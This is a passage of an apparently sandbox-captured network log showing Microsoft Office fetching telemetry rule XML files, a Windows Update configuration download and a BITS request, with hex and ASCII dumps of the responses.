                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:25 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 469
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080625Z-174f78459685726chC1EWRsnbg0000000wu0000000000ms9
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    22192.168.2.74973613.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:25 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080625Z-174f7845968xr5c2hC1EWRd0hn0000000dk00000000032cx
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    23192.168.2.74973713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:25 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080625Z-174f7845968kdththC1EWRzvxn00000008xg00000000abc8
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    24192.168.2.749732172.202.163.200443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:26 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ybAhMg3ktFn4l3f&MD=haNnP8Ll HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:26 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                                    MS-CorrelationId: 59aa7501-708f-45b0-814a-46f7184ca089
                                                                                                                                                                                                                                                                                                                    MS-RequestId: cc16bbe8-579a-44b5-bb02-69347ed87da3
                                                                                                                                                                                                                                                                                                                    MS-CV: 2AnAfioEy0u7MAAN.0
                                                                                                                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:25 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:26 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:26 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    25192.168.2.74974413.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:27 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:27 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 464
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080627Z-174f7845968j6t2phC1EWRcfe80000000wu000000000575z
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:27 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    26192.168.2.74974713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:27 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:27 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080627Z-174f7845968nxc96hC1EWRspw80000000wd0000000004x54
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:28 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    27192.168.2.74974613.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:27 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:27 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080627Z-174f7845968vqt9xhC1EWRgten0000000wr0000000004ggd
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:28 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    28192.168.2.74974813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:27 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:28 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080628Z-174f7845968kvnqxhC1EWRmf3g0000000fgg000000002tra
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:28 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    29192.168.2.74975023.218.208.109443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:28 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:28 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
